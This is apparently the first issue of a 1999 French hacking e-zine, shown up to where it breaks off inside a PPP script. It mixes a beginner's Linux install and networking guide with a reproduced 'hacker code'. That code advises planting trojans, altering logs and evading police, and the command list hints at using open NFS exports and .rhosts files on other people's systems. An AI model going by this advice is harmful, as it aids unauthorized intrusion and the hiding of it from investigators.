                               Le 03/03/1999 à 02:24 AM

             ******************************************************************
             *                     __        __        _____         _____    *
             *  |¯\ |¯|            \ \      / /|¯|    | ____|       | ____|   *
             *  |  \| | /¯¯¯\       \ \ /\ / / |  ¯¯\ |  _|   |¯'¯¯||   |     *
             *  | |\  || (¯) ||¯¯¯¯| \ V  V /  | |¯| || |___  | |¯¯ | |___    *
             *  | | \ | \ ¯ /  ¯¯¯¯   \_/\_/   | | | ||     | | |   |     |   *
             *   ¯   ¯   ¯¯¯                    ¯   ¯  ¯¯¯¯¯   ¯     ¯¯¯¯¯    *
             ******************************************************************

                                            BY

                           *************************************
                           *|¯¯\/¯¯|       |¯|        (¯)      *
                           *| |\/| | /¯¯`¯||  ¯||¯'¯¯||¯|\¯\/¯/*
                           *| |  | || (¯| || |¯ | |¯¯ | | >  < *
                           *| |  | | \ ¯, | \ ¯|| |   | |/ /\ \*
                           * ¯    ¯   ¯¯ ¯   ¯¯  ¯     ¯ ¯¯  ¯¯*
                           *************************************


                         ___,---.__          /'|`\          __,---,___
                      ,-'    \`    `-.____,-'  |  `-.____,-'    //    `-.
                    ,'        |           ~'\     /`~           |        `.
                   /      ___//              `. ,'          ,  , \___      \
                  |    ,-'   `-.__   _         |        ,    __,-'   `-.    |
                  |   /          /\_  `   .    |    ,      _/\          \   |
                  \  |           \ \`-.___ \   |   / ___,-'/ /           |  /
                   \  \           | `._   `\\  |  //'   _,' |           /  /
                    `-.\         /'  _ `---'' , . ``---' _  `\         /,-'
                       ``       /     \    ,='/ \`=.    /     \       ''
                               |__   /|\_,--.,-.--,--._/|\   __|
                               /  `./  \\`\ |  |  | /,//' \,'  \
                              /   /     |-\-+--|--+-/-|     \   \
                             |   |     /'\_\_\ | /_/_/`\     |   |
                              \   \__, \_     `~'     _/ .__/   /
                               `-._,-'   `-._______,-'   `-._,-'
   



Salut tout le monde!!!! un tout nouveau e-mag de hack(surtout),crack,phreack(pas
beaucoup:(,piraterie en tout genre) et autres trucs avec un z a la fin.
on va commencer assez newbies (desole pour les plus performant mais faut bien commencer par
un bout.Mais avant tout le truc à la con :) 

   No-WhErE ne saurait etre tenu responsable de l'irresponsabilité de ces auteurs
par leurs articles ecris, verifiés ou pas, et des problemes qui pourrait
s'en suivre pour vous, lecteurs.Nous ne serions etre tenus responsables des causes de la lecture 
& mise en application des articles ci dessous.Il est evident que ces articles ont été ecris dans
un but d'etude,evitez de prendre ca comme un aller direct a la prison de votre departement.A priori,
nous acceptons tout articles traitant de h/p/c/c/a/v, et meme les autres. En aucun cas des articles
de themes d'ethique racial ne saurait etre tolérés et admis. Si vous voulez casser du noir, ecrivez
a Le Pen(connard) ou a Maigret(connard aussi) mais pas a nous. Toutes personnes faisant partie de 
notre groupe se doit d'ecrire des articles signées, et de ne divulguer son identité ou  a quiconque,
pour quelques raisons que ce soit. L'identité des personnes participant a cet e-mag doit rester 
confidentiel, afin de s'auto proteger, et de rester Virtuels?
Vous ne faites pas partie du groupe et souhaitez nous envoyer des articles,nous poser des questions, 
nous critiquer? les articles seront diffusés, et les courriers rejoindront la rubrique Courriers des lecteurs. 
Meme vos insultes!!!(hein Kleeneex!) 
Nous vous donneront un email dans la seconde issue.No-WhErE est un magazine de libre diffusion, a but non
lucratif, et donc gratuit.Nous vous invitons a le diffuser au maximum. Bonne lecture.

      @Matrix669@ sur #Micro6tem...............

Cherche:gas pour faire des articles (irc c'est marrant,le hack sous 95/98(tout le monde n'a pas linux :(
mais les articles sur unix sont aussi acceptes)et les rubrique prog (comme espion*4*))et sur le theme de
l'IP hijacking et l'IP/ARP Spoofing. 


 
 *)Sommaire.
 ¯¯¯¯¯¯¯¯¯¯¯

   1)Contacter nous!!!!
   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
   2)Y a un truc a respecter!!!!
   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
   3)Un systeme de base Unix ou Linux (pas obligatoire mais utile).
   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
   4)Les programmes Espions en C.
   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
   5)Profiter des ressources partager par une machine en locale sur le net.
   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
   6)Telnet sous 98 c'est con mais ca peut etre amusant pour les mail.
   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
   7)le blablazz.
   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯
   8)Le bonus.
   ¯¯¯¯¯¯¯¯¯¯¯






ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ1)Contacter nousÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Vous me direz où et je repondrai à Matrix669@hotmail.com
Envoyer toutes vos suggestions,idees et cout de main pour faire l'e-mag (genre: des articles)
Pour l'abonnement c'est la même adresse.



Le site de distribution est M'n'K's MICRO6TEM a http://www.multimania.com/matrix669
LE ftp c'est celui du site(pour le passwd c'est un a validité temporaire et en lecture seulement :(() 

Ce mag est dedicacé a Bld :) aux hacker et cracker du groupe (Samsoul;) et a tous les E-mag
(j'ai pompé un peu pour certain truc mais desole les bonnes idees sont deja prise)comme 
No-route,No-way,No-future,NPC,MJ13,etc.........

Une derniere chose heu........................Ah bas windoze, FT et vive unix!!!!!!!!!!!!!!!!



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ2)Le truc a respecter!ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 

Le hacking,cracking,phreacking et autre activite de ce genre sont illegaux et donc punit par la loi
Ce mag est purement educatif n'utiliser pas ces info pour une cible trop importante sous risque d'en payer 
les frais :((((((((((ca peut etre utile quand un boufon vous fait chier sur IRC mais pas plus loin OK
LE SAVOIR est important mais l'acte l'est moins.C'est tout(desole pour les fautes d'orthographes)

sinon le code du hacker en anglais pour les racine de ce hobby :))

I.    Do not intentionally damage *any* system.
II.   Do not alter any system files other than ones needed to ensure 	
	your escape from detection and your future access (Trojan Horses, 
	Altering Logs, and the like are all necessary to your survival for
 	as long as possible.)
III.  Do not leave your (or anyone else's) real name, real handle, or
 	real phone number on any system that you access illegally. They
 	*can* and will track you down from your handle!
IV.   Be careful who you share information with. Feds are getting
 	trickier. Generally, if you don't know their voice phone number,
 	name, and occupation or haven't spoken with them voice on non-info
 	trading conversations, be wary.
V.    Do not leave your real phone number to anyone you don't know. This
 	includes logging on boards, no matter how k-rad they seem. If you
 	don't know the sysop, leave a note telling some trustworthy people
 	that will validate you.
VI.   Do not hack government computers. Yes, there are government
 	systems that are safe to hack, but they are few and far between.
  	And the government has inifitely more time and resources to track 
	you down than a company who has to make a profit and justify
 	expenses.
VII.  Don't use codes unless there is *NO* way around it (you don't have
 	a local telenet or tymnet outdial and can't connect to anything
 	800...) You use codes long enough, you will get caught.  Period.
VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the
 	law. It doesn't hurt to store everything encrypted on your hard
 	disk, or keep your notes buried in the backyard or in the trunk of
 	your car. You may feel a little funny, but you'll feel a lot
 	funnier when you when you meet Bruno, your transvestite cellmate
 	who axed his family to death. Watch what you post on boards. Most
 	of the really great hackers in the country post *nothing* about
 	the system they're currently working except in the broadest sense
 	(I'm working on a UNIX, or a COSMOS, or something generic. Not
 	"I'm hacking into General Electric's Voice Mail System" or
 	something inane and revealing like that.)
X.    Don't be afraid to ask questions. That's what more experienced
 	hackers are for. Don't expect *everything* you ask to be answered,
 	though. There are some things (LMOS, for instance) that a begining
 	hacker shouldn't mess with. You'll either get caught, or screw it
 	up for others, or both.
XI.   Finally, you have to actually hack. You can hang out on boards all
 	you want, and you can read all the text files in the world, but
 	until you actually start doing it, you'll never know what it's all
 	about. There's no thrill quite the same as getting into your first
 	system (well, ok, I can think of a couple of bigger thrills, but
 	you get the picture.)



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ3Un OS (très)potable UnixÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


-PARTIE 1 : INSTALLATION D'UN OS DIGNE DE CE NOM :=) 
                 1.Installer Linux
                 2.commandes primaires à savoir
                 3.Configurer X-Windows et le Network
                 4.vous savez pas c'qu'est un script et quoi
                  en foutre , pas de panique :)
                 5.Vi (éditeur de texte,ca peut servir) :p
                  (ba vi creer un .rhosts par exemple ;))
                 6.commandes telnet , rlogin ,rsh,comment
                  s'envoyer un xterm d'ou on est logué.


I.INSTALLER LINUX
XXXXXXXXXXXXXXXXX

Bon alors déja j'part du principe que vous savez un minimum vous servir d'un
ordinateur,sinon c'est meme pas la peine d'aller plus loin , allez plutot
deja installer le billou95 ou 98 et ses gros bug de Merde.Bon en premier lieu
la place qu'il vous faut , un minimum de 500 mo sont nécessaires pour amenager
un systeme linux correct,cependant vous n'aurez pas d'interface graphique
et je doute que les neuneu que vous etes vous vous en sortiez sans alors ,
on va pas discuter plus longtemps et on fonce créer un disque réservé à
linux de 900mo , ba voui je sais bien ca fait de la taille mais ca en vaut
largement le coup car c'est du multitache ca ! , pas du windoze de merde :)
Pour la question carte graphique vous en faites pas , les versions recentes
noyau reconnaissent la totalite des cartes graphiques disponibles sur le 
marche.(je conseille la redhat 5.2 pour ça)
Vous m'faites a partir de c:\ un ch'ti beau fdisk (pour partitionner) 
si vous aviez de la place inoccupée tant mieux , sinon faut tout repartitio-
nner ;) ; c'est a dire que vous recreez une partition dos principale , vous
l'activez et c'est tout , vous n'allouez pas 400mo destinés plus tard a linux
vous rebootez et reinstallez votre systeme dos et le virus windows95/98 pourri 
voila :)
Bon nous arrivons maintenant a la phase d'installation , on va voir ici cette
installation pour deux distributions differentes que je conseille: la slackware
et la redhat.Elle sont ancienne donc elle ont fait leur preuves on les trouve partout
et elle sont gratuite.Il y a  la Kheops aussi qu'est pas mal et la Mandrake qui vaut le
cout et qu'est en version light dans le PC-team n°40.


A-INSTALLATION DE LA SLACKWARE
------------------------------

La y a deux répertoires qui nous intéressent sur votre cd de linux:les
répertoires rootdsks et bootdsks.144 
Vous allez realiser deux disquettes d'installation grace a ces répertoires.
L'un des deux disks sera une disquette root sur laquelle sera enregistré un
système d'exploitation minimal.Vous allez choisir en fonction de votre mat-
ériel les fichiers dont vous avez besoin dans les deux repertoires cités plus
haut.ex: si vous possedez un pc classique avec disque dur ide et lecteur de 
cdrom goldstar vous créez la disquette de demarrage avec GOLDSTAR.I et le 
disk root avec color.gz.Pour le SCSI(bon matos koi ;-)) c'est les .S
Vous créez un repertoire matrix(clap!clap:)sur votre disque dur :mkdir matrix
puis vous tapez ca : copy d:\bootdsks.144\aha2x9.s c:\matrix
(d:\étant votre lecteur cd)ou au dessus pour les bon gas :) 
copy d:\rootdsks\color.gz c:\matrix
copy d:\install\rawrite.exe c:\matrix
puis vous lancez rawrite.exe situé dans c:\matrix
ca vous marquera : "enter source file name:"
Là vous mettez le premier disk dans votre lecteur et tapez aha..
de meme sur un second disk pour color.gz
mettez le disk de démarrage dans le lecteur a: et relancez la brêle :) 
si tout va bien vous verez ca :
"loading ramdisk ........."
"uncompressing Linux ... done"
sinon vous vous etes gourré de disk ;=)
Le noyau de linux est alors chargé et il analyse votre systeme
il vous demande apres d'installer le disk root
vous metez ce qu'il demande sans broncher
si tout est ok il mettra : 
"RAMDISK : Compressed image found at block 0"
et il jette au prompt :
slackware login:
vous rentrez root en login et que dal en pass faites pas gaffe au
msg d'erreur possible :)
tapez ensuite fdisk
tapez "n" puis entrée
puis entrez p pour une partition primaire
il vous demandra de définir le premier et dernier cylindre de cette part-
ition , entrez successivement la valeur la plus faible et la plus forte.
tapez deux fois "a" pour rendre cette partition linux active
puis sauvegardez avec "w"(write)
vous lancez le setup en tapant "setup"
vous entrez les caractérisques de votre machine (desolé la j'peut pas tout
vous macher ;)).
Lorsqu'il vous demande ou installer linux , indiquez la partition créée anté-
rieurement avec "fdisk".
Vous devrez aussi rattacher votre partition dos à la partition linux pour 
pouvoir avoir accèder a votre lecteur dos sous linux , vous placez alors ce 
disque c:\ dans un repertoire de votre choix exemple /diskc ; c'est un lien,
endroit qui vous permet de communiquer entre les deux systemes.
apres l'installation se déroule...
Vous configurez le LILO ( amorcage de linux...)
je conseil d'installer le lilo sur une disquette d'amorcage comme ca , ca
ne pose pas de problemes si ultérieurement vous installiez winnt4 ou...
(perso: vous etes teuhbes ou une pauv'tanche si vous preferez nt4 à linux mais bon :)).
Il suffira alors de placer cette disquette d'amorcage dans le lecteur lorsque
vous desirez utiliser linux.
END(fin pour les neuneus)

B-INSTALLATION DE LA REDHAT
---------------------------

Cette installation est assez similaire , donc je ne vais pas m'attarder sur
les détails , allez voir la partie intitulée "installation de la slackware";
Pour les disquettes d'installation c'est encore plus simple
qui va m'dire que linux est complexe à installer apres!!! grrr
copiez le fichier rawrite.exe qui se trouve sur le cd d'installation
(d:\dosutlis\rawrite.exe) dans le repertoire c:\dos
mettez une disquette dans le lecteur a: ou b: 
allez sur le cd dans d:\images(d:\ puis cd images(a la base c'est pour les
neuneus ;)))
a partir de la tapez :
"RAWRITE -f boot.img -d A: -n"
vous voila maintenant avec un sh'ti disk boot :)
relancez l'ordi avec le disk dedans et laissez vous guider
la configuration de fdisk...est identique a la distribution Slackware

OUFFFFFF vous voila maintenant avec un sh'ti systeme d'exploitation tout
beau , ca va vous changer de windaube ; ca c'est clair :))))
reste maintenant à configurer xwindow et le network.

II-AVANT UNE P'TITE LISTE NON EXHAUSTIVE DE COMMANDES A SAVOIR.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


-rm fichier : effacer un fichier.
-cd chemin : aller dans un repertoire specifique.
-cd .. :pour descendre un repertoire.
-mount chemin1 chemin2 :monter un systeme de fichier
(ex:mount /toto /guignol le rep toto et tous ses sous rep seront
montés dans guignol ) il en est de meme pour monter un systeme
de fichier d'une machine distante mount adresse:chemin /toto
les rep selectionnés du serveur distant seront accessibles dans
/toto de votre machine (très pratique... hehe :) --->NFS)
-find /chemin -name fichier -print :permet de chercher un fichier 
voulu.
-mv :renommer un fichier ou le bouger.
-ls :list equivalent de dir sous dos.            
-cp fichier 'endroit actuel' 'chemin destinataire' copier un fichier
-chmod change le "mode" ou permissions pour les fichiers ou les
repertoires.
-pwd :montre dans quel répertoire vous etes.           
-mkdir :crée un nouveau répertoire.
-rmdir :vire un repertoire existant.
-who :montre qui est sur le systeme.           
-ps :Process Status.
-man :information à propos d'une commande.
-finger @ip :vous donne des infos sur les users d'un systeme
-finger -l ... : cette option indique les personnes actuelle-
ment connectées.
-showmount -e addresse : vous donnes les reprtoires exportes
par un systeme et si oui à qui.(everyone nous interessera...)
-cat fichier : permet de voir le contenu d'un fichier.
-uname -a :donne le type d'un systeme (ex : sunos toto 4.1)


ATTENTION : la partie ci-dessous est la pour combler et pour que ca est l'air plus gros
            alors n'y pretez pas grande attention :=)

-----------------------------------
COMMANDES DU MAIL POUR MACHINE UNIX 
-----------------------------------
(la ca m'fesait chier de traduire alors j'ai extrait ca de "unix" commands
 de THE REBEL:))alors tous a vos dico(et le pingouin,non,LA TANCHE qui me fait chier parce qque FF7 c'est 
 en anglais et qu'il arrive pas a le mettre en français je l'emmerde!!!!!!!!!!!!!!!!!!!!!!!)

mailx (AT&T)                Mail program for sending/reading messages.

Mail (BSD)                  Mail program for sending/reading messages.

uuname                      Shows which computers the system is connected to.

.mailrc                     Start-up file for mail. Modify this file to
                            customize your mail(mailx or Mail) program.

/bin/mail                   A stone-aged mail program.

write                       Sends on-line message to another user.

talk                        Instantaneously sends and receives messages.

mesg                        Prevents other users from interrupting you with
                            either the talk or write commands.

chat                        Another program for sending on-line messages
                            between users.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
                              mailx/Mail Commands
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Command      Abbreviation     Meaning
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

!command       none           Execute the shell command specified by "comand".

#              none           Comment(e.g.,in .mailrc files).This command is
                              available only in AT&T's System V.

=              none           Displays numbers of current message. This
                              command is available only in AT&T's System V.

?              none           Displays list of mailx/Mail commands.

-              none           Displays previous message(e.g., -3 would mean to
                              back up 3 messages from the current message and
                              display that message).

alias          a              Defines a single name for a set of user names.

alternates     alt            Tells mailx/Mail alternate names for a user
                              name. With no argument, lists your alternate
                              names.

chdir          cd             Change directory. If no argument, changes to
                              your home directory.

copy           co             Copies message to a file(or folder). Does not
                              earmark for deletion when you quit(q) the mail
                              program.

Copy           none           Copies message to a file which is named after
                              the sender of the message. This command is
                              available only in AT&T's System V.

delete         d              Deletes messages.

discard        none           Suppresses display of the specified header
                              fields when displaying messages. The Print and
                              Type commands override this command. This
                              command is equivalent to the ignore command.
                              This command is available only in AT&T's System
                              V.

dp or dt       none           Deletes current message and displays the next
                              message.

echo           none           Displays the specified string.

edit           e              Invokes editor for a given message or messages.

else           none           Conditionally executes mailx commands. Used with
                              if.

endif          none           Marks the end of an if statement. See if.

exit           ex,x,xit       Leaves mailx/Mail program, retaining all message
                              in mailbox EXACTLY as at the beginning of the
                              mail session.

file           fi             Begins reading a new file of messages.
                                          Special Symbols:
                                          %  -  current mailbox
                                      %name  -  mailbox of another user
                                          #  -  the last file read
                                          &  -  your mbox
                               +folder (BSD) - a folder

folder         fo             Same as file.

folders        none           List your folders.

followup       none           Replies to a message. Your reply is saved in a
                              file named after the original sender of the
                              message.  This command is available only in
                              AT&T's System V.

Followup       none           Replies to the first message in a message list.
                              Your reply is sent to the sender of each message
                              in the message list and is saved in a file named
                              after the send of the first message. This
                              command is available only in AT&T's System V.

from           f              Displays header lines of message in the message
                              list specified.

group          none           Same as alias.

headers        h              Displays group of header lines containing the
                              specified message.

help           none           Prints a brief summary of mailx commands.

hold           ho             Retains the specified messages in the mailbox;
                              they won't be moved to mbox. Same as preserve.

if send        none           Conditionally executes Mail commands in the
|receive                      .mailrd file, depending on whether you are
                              reading(if receive) or sending(if send) mail.
                              Used with endif.  This command is available only
                              in Berkeley's version.

if s|r         none           AT&T's "if send|receive" command. This command
                              is available only in AT&T's System V.

ignore         none           Supresses display of the specified header fields
                              when displaying messages. This command is the
                              same as discard.  The Print and Type commands
                              overide this command.

list           none           Lists mailx/Mail commands.

mail           m              Sends mail to specified names.

mbox           none           Saves the specified messages in mbox when you
                              use the quit command.

next           n,+, Return    Displays the next message or the message
                              specified.

pipe           |              Pipes the message through the specified command.
                              With no arguments specified, this command pipes
                              the current message though the command
                              designated by the cmd variable.  With the page
                              variable set, each message has a form feed
                              inserted after it.  This command is available
                              only in AT&T's System V.

preserve       none           Keeps the specified messages in your mailbox
                              when you quit. This command is the same as the
                              hold command.

print          p              Displays specified messages.

Print          P              Displays specified messages, including all
                              header fields.

quit           q              Leaves mailx, updating system malbox and mbox as
                              appropriate.

reply/respond  r              Composes a reply to a message, sending it to the
                              author of the original message and to all the
                              people, except you, who received the message.

Reply/Respond  R              Composes a reply to a message, sending it ONLY
                              to the author of the original message.

save           s              Appends messages to a file. If no file is
                              specified, saves to mbox.

Save           none           Saves the specified messages in a file named
                              after the sender of the first message. This
                              command is available only in AT&T's System V.

set            se             Sets binary or valued options.

shell          sh             Creates a shell in which you can enter Unix
                              commands. When you leave the shell, you are
                              returned to mailx/Mail.

size           none           Displays the size(in characters) for the
                              specified messages. This command is available
                              only in AT&T's System V.

source         so             Executes the mailx/Mail commands in the
                              specified file.

top            to             Prints the first so many ( 5 by default ) lines
                              of each message in the message list.

touch          none           Moves messages in the message list to mbox when
                              you quit, unless the messages are specifically
                              saved to a file.  This command is available only
                              in AT&T's System V.

type           t              Displays specified messages. This command is the
                              same as the print command.

Type           T              Displays specified messages, including all
                              header fields. This command is the same as the
                              Print command.

unalias        none           Removes one or more aliases from the list of
                              aliases. This command is available only to
                              Berkeley's version of Unix.

undelete       u              Recovers messages in the message list that have
                              been deleted in the current mail session.

unset          none           Undoes the operation of a set command.

version        none           Displays the version and release date of the
                              program. This command is only available in
                              AT&T's System V.

visual         v              Invokes visual editor on a list of messages.

write          w              Appends messages to a file; doesn't include
                              headers. Otherwise, similar to save.

xit            x              Synonym for exit.

z+             z              Scrolls to next screenfull of headers.

z-             none           Scrolls to previous screenfull of headers.


III-CONFIGURER X-WINDOW ET LE NETWORK
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


A-XWINDOW
---------

tapez "xf86config"
Là il va vous harceler de questions , on s'croierait avec les c.n.é.
de la DST ou de la BSA :p
en gros mettez emulate 3 boutons oui
souris microsoft compatible
cherchez votre carte graphique dans la liste
a la fin mettez comme server x le 5 celui definit a partir des specifications
données sur votre amterial , ramdac de la carte graphique et clock bidul ,
passez on s'en fout :) rentrez par contre le balayage vertical et horizontal
de votre moniteur , vous trouverez ca dans le manuel de votre ecran.
j'vous conseil de configurer  les resolutions en 1024*768 avec un ecran
virtuel.
pour changer de resolutions quand vous etes dans x pressez "alt +"
pour les moins neophites , un p'tit vi sur xf86config s'avere plus rapide ;)
apres vous tapez "startx"
et si vous avez pas fait de bourde totu va bien,o joie o miracle x se 
lance :))
Si marche pas , recommencez la configuration de xf86config,vous avez merdé
quelquepart.


Bonus : farfouinez un peut sous x pour voir les commandes dispos , en gros
vous pouvez ouvrir plusieurs login en pressant alt-ctrl-(f1 f2...)
pour revenir au premier "alt-ctrl-f7" enfin testez tout ca :)
ca peut servir plusieurs shells , n'oubliez pas que c'est du multitache
ex: vot shell de root avec la connect internet , un shell user pour l'irc...
pour quitter xwindows pressez : "ctrl alt et la grosse touche au-dessus de enter
avec un flèche vers la gauche (NON pas la touche menu demmarer a la con ;))

B-LE NETWORK
------------

Alors la pleins de possibites , pour les plus temeraires on s'fait les p'tits
fichiers a la main :)
y vous faut un pilote ppp deja :)
si l'on a une addresse ip bien definie , il faut le signaler au port série
a l'aide de la commande /sbin/ifconfig

ex de commandes pour liaison SLIP:
/usr/sbin/slattach -s 33600 *dev/ttyS1 &
/sbin/iconfig slO 194.251.125.51 pointtopoint 194.163.125.42
/sbin/route add default gw 194.163.125.42

etablissement d'une connection entre 194.251.125.51 (vous) et 194.163.125.42
(le fournisseur d'acces)
(adresses bidons bien entendu...)

Dans le cas qui nous interesse plus d'une liaison ppp deux programmes etabli-
ssent la liaison : /usr/sbin/pppd et /usr/sbin/chat
avec les memes donnes que ci-dessus les commandes a taper sont :
/usr/sbin/pppd /dev/ttyS1 lock connect \
'char -f /etc/ppp/ppp.chat' crtscts modem \
defaultroute 194.251.125.51:194.163.125.42
dans le cas d'une ip dynamique , pas preciser la premiere addresse ip
pour arreter la connection : "/bin/killall slattach" (pour une liaison ppp)
pour slip rajouter "/sbin/ifconfig dlO doph" avant

Bon à la base là c'est pour les neuneus et j'avoue que meme moi le manuel ca
m'prends la tete (ceux qui me connaissent me comprendrons;) alors allez sous xwindows
et dans control panel(bouhou!!! en tout cas ca existe sur la redhat ) aller dans 
network config la vous pouvez add une nouvelle connection dans "interfaces" rentrez
le numero a appeller , votre login pass , le dns du serveur (ip remote address), si vous
ne l'avez pas contactez; votre fournisseur d'accès et demandez lui mais
attention il ne faut rentrer que le second , le premiere tant l'ip fixe alors
si vous n'en avez pas inscrivez rien mettez liaison 115200 et puis voila :)
suffit de presser active lorsque vous voulez vous connecter et il vous fera
ca comme un grand ; pour déconnecter pressez inactive :p).
Bon aller,on va faire encore plus simple , un ch'ti script bien pratique pour
vous configurer tout ca :=3 
Ce pack est composé de 4 fichiers différents , coupez aux bons endroits :)

----cut--------cut-------------cut------------cut--------cut-----------cut----
README.TXT

Installation du script PPP.
=-=-=-=-=-=-=-=-=-=-=-=-=-=

1. Modifie le fichier ppp-on et met a la place de TELEPHONE= le numero de
   telephone de ton provider, ton login pour ACCOUNT, et ton mot de passe pour
   PASSWORD=...

2. Renomme ce fichier comme ca te plait, puis met le dans /usr/sbin par
   exemple.
---------------------------------------------------------------------------
TK4 NOTE : pour copier un fichier : cp fichier destination
---------------------------------------------------------------------------
3. Copie le fichier ppp-on-dialer et ip-up dans /etc/ppp
   ip-up est necessaire si tu as a la fois une carte ethernet et un access
   PPP.

4. Modifie le fichier /etc/resolv.conf et met :
   nameserver 123.123.123.123 (en fait tu mets le serveur DNS de ton FAI)

5. Verifie la securite de tes fichiers, pour qu'il soit en ---x--x--x 
   pour cela tape chmod 111 ppp-on. Verifie egalement la securite de tes
   fichiers de logs de ton syslogd.

6. Enjoy, lance ppp-on pour te connecter, puis ppp-off pour te deconnecter.
------------------------------------------------------------------------------
Script PPP-ON:
----cut-----cut--------------cut------------cut-------cut-------------cut----------

#!/bin/sh
#
# Script pour initier une connection ppp. C'est la 1ere partie des deux
# paires de scripts . Ce n'est psa une paire securisée de script si bien que 
# que les codes sont visibles avec la commande 'ps'.hehe,Simeple non?? ;)
#
# These are the parameters. Change as needed.
TELEPHONE=0123456789	# The telephone number for the connection (en decodé le numero
                        # du prestataire)
ACCOUNT=foo		# The account name for logon (votre login)
PASSWORD=bar		# The password for this account (votre pass)
LOCAL_IP=0.0.0.0	# Local IP address if known. (rentrez 0.0.0.0
